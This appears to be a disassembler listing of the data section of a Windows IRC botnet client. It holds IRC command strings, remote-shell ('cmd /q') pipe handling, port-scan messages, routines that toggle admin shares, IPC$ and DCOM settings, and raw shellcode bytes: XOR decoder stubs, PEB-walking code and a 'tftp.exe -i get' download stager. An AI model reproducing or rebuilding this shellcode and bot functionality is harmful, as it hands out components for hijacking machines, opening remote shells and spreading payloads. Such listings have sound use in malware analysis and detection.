dword_4385B0 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+984�o
; sub_40EE72+4ABC�o
dd 2BBBB02h
aFailedToSta_30 db ' Failed to start transfer thread, error: <%d>.',0
dword_4385F8 dd 49544F4Eh, 25204543h, 13A2073h, 474E4950h, 1732520h
; DATA XREF: sub_40EE72+973�o
dd 0A0Dh
dword_438610 dd 4E495001h, 47h ; DATA XREF: sub_40EE72+93F�o
aSHasJustVersio db '%s has just versioned me.',0 ; DATA XREF: sub_40EE72+8F9�o
align 4
dword_438634 dd 49544F4Eh, 25204543h, 13A2073h, 53524556h, 204E4F49h
; DATA XREF: sub_40EE72+8DC�o
dd 0D017325h, 0Ah
dword_438650 dd 52455601h, 4E4F4953h, 1 ; DATA XREF: sub_40EE72+8AB�o
dword_43865C dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+791�o
dd 2BBBB02h
aReceiveFileSFr db ' Receive file: ',27h,'%s',27h,' from user: %s.',0
aSend_0 db 'SEND',0 ; DATA XREF: sub_40EE72+6E8�o
align 10h
dword_4386A0 dd 43434401h, 0 ; DATA XREF: sub_40EE72+6CA�o
dword_4386A8 dd 323333h ; DATA XREF: sub_40EE72+651�o
; sub_40EE72+B4F�o ...
dword_4386AC dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5D2�o
dd 2BBBB02h
aUserSLoggedOut db ' User: %s logged out.',0
align 4
dword_4386DC dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5AB�o
dd 2BBBB02h
aJoinedChanne_0 db ' Joined channel: %s.',0
align 4
a353 db '353',0 ; DATA XREF: sub_40EE72+574�o
aPart db 'PART',0 ; DATA XREF: sub_40EE72+526�o
; sub_40EE72+5EF�o
align 4
aSS_1 db ':%s%s',0 ; DATA XREF: sub_40EE72+4FE�o
align 10h
aNick db 'NICK',0 ; DATA XREF: sub_40EE72+3D0�o
align 4
aNoticeSS db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_40EE72+371�o
; sub_40EE72+613�o
dword_438738 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+355�o
; sub_40EE72+5FF2�o ...
dd 2BBBB02h
aUserSLoggedO_0 db ' User %s logged out.',0
align 4
aKick db 'KICK',0 ; DATA XREF: sub_40EE72+2E4�o
align 10h
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_40EE72+28D�o
; sub_40EE72+4EB5�o ...
align 4
a433 db '433',0 ; DATA XREF: sub_40EE72+262�o
a@: ; DATA XREF: sub_40EE72+23A�o
unicode 0, <@>,0
a302 db '302',0 ; DATA XREF: sub_40EE72+22A�o
a005 db '005',0 ; DATA XREF: sub_40EE72+215�o
a001 db '001',0 ; DATA XREF: sub_40EE72+200�o
aJoinSS db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_40EE72+1E4�o
; sub_40EE72+3B7�o ...
align 10h
aPongS db 'PONG %s',0Dh,0Ah,0 ; DATA XREF: sub_40EE72+1C3�o
align 4
aPing db 'PING',0 ; DATA XREF: sub_40EE72+1A9�o
align 4
asc_4387B4: ; DATA XREF: sub_40EE72+19A�o
; sub_40EE72+60F9�o
unicode 0, <!>,0
asc_4387B8 db ' :',0 ; DATA XREF: sub_40EE72+86�o
; sub_40EE72:loc_40FA19�o
align 4
aSD_0 db ' %s (%d)',0 ; DATA XREF: sub_415188+120�o
align 4
unk_4387C8 db 2 ; DATA XREF: sub_415339:loc_4153C0�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aProcessListFai db 'Process list failed.',0
align 10h
unk_438800 db 2 ; DATA XREF: sub_415339+80�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aProcessListCom db 'Process list completed.',0
unk_438838 db 2 ; DATA XREF: sub_415339+19�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aListingProcess db 'Listing processes:',0
align 4
dword_43886C dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_41547E+1E9�o
dd 2029671Fh, 2BBBB02h
aUserLoggedOutS db ' User logged out: <%s@%s>.',0
dword_4388A4 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_41547E+1C2�o
dd 2029671Fh, 2BBBB02h
aErrorSessionru db ' Error: SessionRun(): <%d>.',0
align 10h
dword_4388E0 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_41547E+1A2�o
dd 2029671Fh, 2BBBB02h
aUserLoggedInS@ db ' User logged in: <%s@%s>.',0
align 4
aPermissionDeni db 'Permission denied',0Ah,0 ; DATA XREF: sub_41547E+172�o
align 4
dword_43892C dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_41547E+E1�o
dd 2029671Fh, 2BBBB02h
aErrorGetpeerna db ' Error: getpeername(): <%d>.',0
align 4
dword_438968 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_415683:loc_4156C8�o
dd 2029671Fh, 2BBBB02h
aProtocolString db ' Protocol string too long.',0
dword_4389A0 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_4156DD+1B�o
dd 2029671Fh, 2BBBB02h
aLoginRejectedR db ' Login rejected, Remote user: <%s@%s>.',0
dword_4389E4 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_41570C+219�o
dd 2029671Fh, 2BBBB02h
aErrorServerF_0 db ' Error: server failed, returned: <%d>.',0
dword_438A28 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_41570C+1FB�o
dd 2029671Fh, 2BBBB02h
aFailedToSta_31 db ' Failed to start client thread, error: <%d>.',0
align 4
dword_438A74 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_41570C+177�o
dd 2029671Fh, 2BBBB02h
aClientConnec_2 db ' Client connection from IP: %s:%d, Server thread: %d.',0
align 4
dword_438AC8 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_41570C+106�o
dd 2029671Fh, 2BBBB02h
aReadyAndWaitin db ' Ready and waiting for incoming connections.',0
align 4
dword_438B14 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_41570C+70�o
dd 2029671Fh, 2BBBB02h
aFailedToInstal db ' Failed to install control-C handler, error: <%d>.',0
dword_438B64 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_41570C+3D�o
dd 2029671Fh, 2BBBB02h, 72452020h, 3A726F72h, 41535720h
dd 72617453h, 28707574h, 3C203A29h, 2E3E6425h, 0
aConst db 'const',0
align 4
dd 0
dword_438BAC dd 1 ; DATA XREF: sub_415CFF+7�o
off_438BB0 dd offset sub_415994 ; DATA XREF: sub_415CFF+49�r
aLetter db 'letter',0
align 10h
dd 2, 4159F2h, 706D6F63h, 2 dup(0)
dd 3, 415A3Fh, 6E756F63h, 797274h, 0
dd 4, 415ADDh, 736Fh, 2 dup(0)
dd 5, 415B52h
dword_438C04 dd 69257325h, 0 ; DATA XREF: sub_415994+40�o
; _0:00415ABE�o ...
byte_438C0C db 50h ; DATA XREF: _0:00415A61�o _0:00415A6E�r
db 43h, 2 dup(0)
dword_438C10 dd 7C7325h ; DATA XREF: _0:00415B0C�o
; sub_415CFF+39�o
dword_438C14 dd 5D73255Bh, 7Ch ; DATA XREF: _0:00415C16�o
dword_438C1C dd 334B32h ; DATA XREF: _0:00415C06�o
dword_438C20 dd 5D64255Bh, 7325h ; DATA XREF: sub_415C5C+3A�o
dword_438C28 dd 5D4D5Bh ; DATA XREF: sub_415C5C+2C�o
; sub_415C5C+57�o
unk_438C2C db 2 ; DATA XREF: sub_415D68+92�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aIpSPortDIsOp_0 db ' IP: %s Port: %d is open.',0
unk_438C64 db 2 ; DATA XREF: sub_415E35+41�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aScanningIpSPor db ' Scanning IP: %s, Port: %d.',0
align 10h
off_438CA0 dd offset dword_438CD8 ; DATA XREF: sub_415F86+1B3�o
; sub_4162AA+17A�o
align 8
dd offset dword_438CD0
align 10h
off_438CB0 dd offset dword_438CCC ; DATA XREF: sub_4162AA+1E3�o
dd offset dword_438CC8
dd offset dword_438CC4
dd offset dword_438CC0
dword_438CC0 dd 5C3A44h ; DATA XREF: sub_415F86+217�o
; _2:00438CBC�o
dword_438CC4 dd 2444h ; DATA XREF: _2:00438CB8�o
dword_438CC8 dd 5C3A43h ; DATA XREF: _2:00438CB4�o
dword_438CCC dd 2443h ; DATA XREF: _2:off_438CB0�o
dword_438CD0 dd 494D4441h, 244Eh ; DATA XREF: _2:00438CA8�o
dword_438CD8 dd 24435049h, 0 ; DATA XREF: _2:off_438CA0�o
unk_438CE0 db 2 ; DATA XREF: sub_415F86+2E5�o
; sub_4162AA+2DB�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aNetapi32_dllCo db ' Netapi32.dll couldn',27h,'t be loaded.',0
align 10h
unk_438D20 db 2 ; DATA XREF: sub_415F86+2CF�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aNetworkSharesD db ' Network shares deleted.',0
align 4
unk_438D58 db 2 ; DATA XREF: sub_415F86:loc_4161E8�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aFailedToDelete db ' Failed to delete ',27h,'%S',27h,' share.',0
align 4
unk_438D94 db 2 ; DATA XREF: sub_415F86+25B�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aShareSDeleted_ db ' Share ',27h,'%S',27h,' deleted.',0
align 4
unk_438DC8 db 2 ; DATA XREF: sub_415F86:loc_416155�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aFailedToDele_0 db ' Failed to delete ',27h,'%s',27h,' share.',0
align 4
unk_438E04 db 2 ; DATA XREF: sub_415F86+1C8�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aShareSDelete_0 db ' Share ',27h,'%s',27h,' deleted.',0
align 4
unk_438E38 db 2 ; DATA XREF: sub_415F86:loc_4160B8�o
; sub_4162AA:loc_4163D8�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aAdvapi32_dllCo db ' Advapi32.dll couldn',27h,'t be loaded.',0
align 4
unk_438E78 db 2 ; DATA XREF: sub_415F86:loc_4160B1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aFailedToOpenIp db ' Failed to open IPC$ Restriction registry key.',0
align 4
unk_438EC4 db 2 ; DATA XREF: sub_415F86:loc_416093�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aRestrictedAcce db ' Restricted access to the IPC$ Share.',0
align 4
unk_438F08 db 2 ; DATA XREF: sub_415F86+106�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aFailedToRestri db ' Failed to restrict access to the IPC$ Share.',0
align 4
aRestrictanonym db 'restrictanonymous',0 ; DATA XREF: sub_415F86+ED�o
; sub_4162AA+ED�o
align 4
unk_438F68 db 2 ; DATA XREF: sub_415F86+91�o
; sub_4162AA+91�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aFailedToOpenDc db ' Failed to open DCOM registry key.',0
align 4
dword_438FA8 dd 7A026E02h, 201F6D1Fh, 63657328h, 2E657275h, 1F6C1F70h
; DATA XREF: sub_415F86:loc_415FF3�o
dd 2202967h, 2002BBBBh, 4F434420h, 6964204Dh, 6C626173h
dd 2E6465h
unk_438FD4 db 2 ; DATA XREF: sub_415F86+66�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aDisableDcomFai db ' Disable DCOM failed.',0
align 4
aEnabledcom db 'EnableDCOM',0 ; DATA XREF: sub_415F86+54�o
; sub_4162AA+54�o
align 4
word_439014 dw 4Eh ; DATA XREF: sub_415F86+38�r
align 4
unk_439018 db 2 ; DATA XREF: sub_4162AA+2C3�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aNetworkSharesA db ' Network shares added.',0
align 4
aC_2 db '%c:\',0 ; DATA XREF: sub_4162AA+230�o
align 4
aC_3 db '%c$',0 ; DATA XREF: sub_4162AA+219�o
unk_439058 db 2 ; DATA XREF: sub_4162AA:loc_416449�o
; sub_4162AA:loc_41651A�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aFailedToAddSSh db ' Failed to add ',27h,'%s',27h,' share.',0
align 10h
unk_439090 db 2 ; DATA XREF: sub_4162AA+198�o
; sub_4162AA+269�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aShareSAdded_ db ' Share ',27h,'%s',27h,' added.',0
align 10h
unk_4390C0 db 2 ; DATA XREF: sub_4162AA:loc_4163D1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aFailedToOpen_0 db ' Failed to open IPC$ restriction registry key.',0
align 4
unk_43910C db 2 ; DATA XREF: sub_4162AA:loc_4163B3�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aUnrestrictedAc db ' Unrestricted access to the IPC$ Share.',0
unk_439150 db 2 ; DATA XREF: sub_4162AA+102�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aFailedToUnrest db ' Failed to unrestrict access to the IPC$ Share.',0
dword_43919C dd 7A026E02h, 201F6D1Fh, 63657328h, 2E657275h, 1F6C1F70h
; DATA XREF: sub_4162AA:loc_416317�o
dd 2202967h, 2002BBBBh, 4F434420h, 6E65204Dh, 656C6261h
dd 2E64h
unk_4391C8 db 2 ; DATA XREF: sub_4162AA+66�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aEnableDcomFail db ' Enable DCOM failed.',0
align 4
word_4391FC dw 59h ; DATA XREF: sub_4162AA+38�r
align 10h
dword_439200 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_4165C4+DE�o
dd 2029671Fh, 2BBBB02h
aWaitformultipl db ' WaitForMultipleObjects error: <%d>.',0
align 4
dword_439244 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_4165C4+59�o
; sub_4165C4+8B�o
dd 2029671Fh, 2BBBB02h
aFailedToCrea_0 db ' Failed to create ReadShell session thread, error: <%d>.',0
align 4
dword_43929C dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_416715+AF�o
dd 2029671Fh, 2BBBB02h
aFailedToExecut db ' Failed to execute shell.',0
align 4
dword_4392D4 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_416715+7E�o
dd 2029671Fh, 2BBBB02h
aFailedToCrea_1 db ' Failed to create shell stdin pipe, error: <%d>.',0
align 4
dword_439324 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_416715+5C�o
dd 2029671Fh, 2BBBB02h
aFailedToCrea_2 db ' Failed to create shell stdout pipe, error: <%d>.',0
align 4
dword_439374 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_41680E+C3�o
dd 2029671Fh, 2BBBB02h
aFailedToExec_0 db ' Failed to execute shell, error: <%d>.',0
aCmdQ db 'cmd /q',0 ; DATA XREF: sub_41680E+8C�o
align 10h
dword_4393C0 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_4168E7+A1�o
dd 2029671Fh, 2BBBB02h
aSessionreadshe db ' SessionReadShellThread exited, error: <%ld>.',0
align 4
loc_43940C: ; DATA XREF: sub_416C53+C4�o
jmp short loc_439410
; ---------------------------------------------------------------------------
loc_43940E: ; CODE XREF: _2:loc_439410�p
jmp short loc_439415
; ---------------------------------------------------------------------------
loc_439410: ; CODE XREF: _2:loc_43940C�j
call loc_43940E
loc_439415: ; CODE XREF: _2:loc_43940E�j
pop ebx
xor ecx, ecx
; ---------------------------------------------------------------------------
db 66h, 0B9h
word_43941A dw 0FFFFh ; DATA XREF: sub_416C53+CC�w
db 80h, 73h, 0Eh
byte_43941F db 0FFh ; DATA XREF: sub_416C53+D3�w
dd 0F9E243h
; ---------------------------------------------------------------------------
loc_439424: ; DATA XREF: sub_416C53+A2�o
jmp short loc_439428
; ---------------------------------------------------------------------------
loc_439426: ; CODE XREF: _2:loc_439428�p
jmp short loc_43942D
; ---------------------------------------------------------------------------
loc_439428: ; CODE XREF: _2:loc_439424�j
call loc_439426
loc_43942D: ; CODE XREF: _2:loc_439426�j
pop ebx
xor ecx, ecx
; ---------------------------------------------------------------------------
db 0B1h
byte_439431 db 0FFh ; DATA XREF: sub_416C53+AA�w
dw 7380h
db 0Ch
byte_439435 db 0FFh ; DATA XREF: sub_416C53+B0�w
dw 0E243h
dd 0F9h
dword_43943C dd 364C033h, 0C783040h, 8B0C408Bh, 8BAD1C70h, 9EB0840h
; DATA XREF: sub_416ADC+57�o
dd 8D34408Bh, 408B7C40h, 3D08B3Ch, 0CA8B3C40h, 8B784803h
dd 0DA8B2041h, 331C5903h, 57F633FFh, 3CA8B57h, 7981100Ch
dd 7373650Ah, 8B027541h, 3798133h, 72685474h, 3B8B0275h
dd 8304C083h, 0F68504C3h, 0FF85DB74h, 0F203D774h, 0E857FA03h
dword_4394A0 dd 12h ; DATA XREF: sub_416ADC+3D�w
aTftp_exeIGet db 'tftp.exe -i get ',0 ; DATA XREF: sub_416ADC+79�o
aJ db 'j',0
db 0E8h
dword_4394B9 dd 17h ; DATA XREF: sub_416ADC+4D�w
; ---------------------------------------------------------------------------
jnz short near ptr byte_4394C0
retn
; ---------------------------------------------------------------------------
byte_4394C0 db 0E8h ; CODE XREF: _2:004394BD�j
dword_4394C1 dd 1 ; DATA XREF: sub_416ADC+45�w
byte_4394C5 db 0, 6Ah, 0 ; DATA XREF: sub_416ADC+C2�o
dd 7E8h
db 0, 0Fh, 84h
dword_4394CF dd 0FFFFFFEDh ; DATA XREF: sub_416ADC+5D�w
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
pop eax
pop ebx
pop ebp
push eax
sub esp, 54h
xor eax, eax
mov edi, esp
lea ecx, [eax+40h]
mov edx, edi
rep stosb
mov al, 44h
stosd
push edi
push edx
push ecx
push ecx
push 28h
push 1
push ecx
push ecx
push ebp
push ebx
call esi
add esp, 54h
test eax, eax
retn
; ---------------------------------------------------------------------------
align 10h
aThreadList db '-[Thread List]-',0 ; DATA XREF: sub_416E17+10�o
aSNoSThreadFoun db '%s: No %s thread found.',0 ; DATA XREF: sub_416FE8+51�o
aSSStopped_DThr db '%s: %s stopped. (%d thread(s) stopped.)',0 ; DATA XREF: sub_416FE8+35�o
dword_439550 dd 289C189Dh ; DATA XREF: sub_417300+4�w sub_41730A�r ...
align 10h
dword_439560 dd 173Fh ; DATA XREF: sub_417CA4+D�r
dd 9875h, 9873h
off_43956C dd offset sub_417D73 ; DATA XREF: sub_419AB8�r
dd offset nullsub_3
dd offset nullsub_3
dword_439578 dd 1B3Fh ; DATA XREF: sub_417DEB+D�r
dword_43957C dd 19930520h, 4 dup(0) ; DATA XREF: sub_41826D+2�o
; sub_418276+2�o
off_439590 dd offset sub_419AF6 ; DATA XREF: sub_419CDA+1C�r
dword_439594 dd 2 ; DATA XREF: sub_41F84C+E�r
; sub_41F885+46�r ...
off_439598 dd offset aNull_0 ; DATA XREF: sub_419E38:loc_41A19C�r
; sub_419E38+457�r
; "(null)"
off_43959C dd offset aNull ; DATA XREF: sub_419E38+259�r
; "(null)"
off_4395A0 dd offset word_4395AA ; DATA XREF: sub_417794+23�r
; sub_417794:loc_4177F5�r ...
off_4395A4 dd offset word_4395AA ; DATA XREF: sub_422EB1+18�r
db 2 dup(0)
word_4395AA dw 20h ; DATA XREF: sub_42102E+18�r
; _2:off_4395A0�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_4397AC dd 1 ; DATA XREF: sub_417794:loc_41779C�r
; sub_417794:loc_4177E0�r ...
byte_4397B0 db 2Eh ; DATA XREF: sub_41C86F:loc_41C8AF�r
; sub_41C8C9+4�r ...
align 4
dd 1, 10h, 0
off_4397C0 dd offset off_4397C0 ; DATA XREF: sub_41B888+D�o
; sub_41B888+69�o ...
off_4397C4 dd offset off_4397C0 ; DATA XREF: sub_41B888:loc_41B908�r
; sub_41B888+89�w ...
dd offset dword_4397D8
dd offset dword_4397D8
dword_4397D0 dd 0FFFFFFFFh ; DATA XREF: sub_41B888�r
; sub_41B9CC:loc_41BA19�w
dd 0FFFFFFFFh
dword_4397D8 dd 0F0h, 0F1h, 800h dup(0) ; DATA XREF: _2:004397C8�o
; _2:004397CC�o
off_43B7E0 dd offset off_4397C0 ; DATA XREF: sub_41B9CC+15�r
; sub_41B9CC+20�w ...
dword_43B7E4 dd 1E0h ; DATA XREF: sub_417BC7:loc_417C03�r
; sub_41944F+185�r ...
dword_43B7E8 dd 14h ; DATA XREF: sub_41C5B8+2�o
off_43B7EC dd offset aExp ; DATA XREF: sub_41C5B8:loc_41C5D5�r
; "exp"
dd 1Dh, 42480Ch, 1Ah, 424808h, 1Bh, 424800h, 1Fh, 4247F8h
dd 13h, 4247F0h, 21h, 4247E8h, 0Eh, 4247E0h, 0Dh, 4247D8h
dd 0Fh, 4247D0h, 10h, 4247C8h, 5, 4247C0h, 1Eh, 4247BCh
dd 12h, 4247B8h, 20h, 4247B4h, 0Ch, 4247ACh, 0Bh, 4247A4h
dd 15h, 42479Ch, 1Ch, 424794h, 19h, 42478Ch, 11h, 424784h
dd 18h, 42477Ch, 16h, 424774h, 17h, 42476Ch, 22h, 424768h
dd 23h, 424764h, 24h, 424760h
dbl_43B8C0 dq 1.797693134862316e308 ; DATA XREF: sub_41C2F3+B7�r
; sub_41C2F3:loc_41C3DA�r ...
dd 0
dd 0FFF80000h
dbl_43B8D0 dq 1.797693134862316e308 ; DATA XREF: sub_41C2F3+92�r
; sub_41C2F3:loc_41C3B2�r ...
dd 0
dd 100000h, 0
dd 80000000h
tbyte_43B8E8 dt 2.3562723457267347066e313 ; DATA XREF: sub_41C7A0+D�r
; sub_41C7A0+1F�r
align 4
tbyte_43B8F4 dt 1.9149954921904370718e-1233 ; DATA XREF: sub_41C7A0+31�r
align 10h
off_43B900 dd offset sub_41CC34 ; DATA XREF: sub_417D8B+F�w
; sub_419E38+3AA�r
off_43B904 dd offset sub_41C8C9 ; DATA XREF: sub_417D8B+5�w
; sub_419E38+3E2�r
off_43B908 dd offset sub_41C92F ; DATA XREF: sub_417D8B+14�w
; sub_41D797+430�r
off_43B90C dd offset sub_41C86F ; DATA XREF: sub_417D8B+1E�w
; sub_419E38+3CB�r
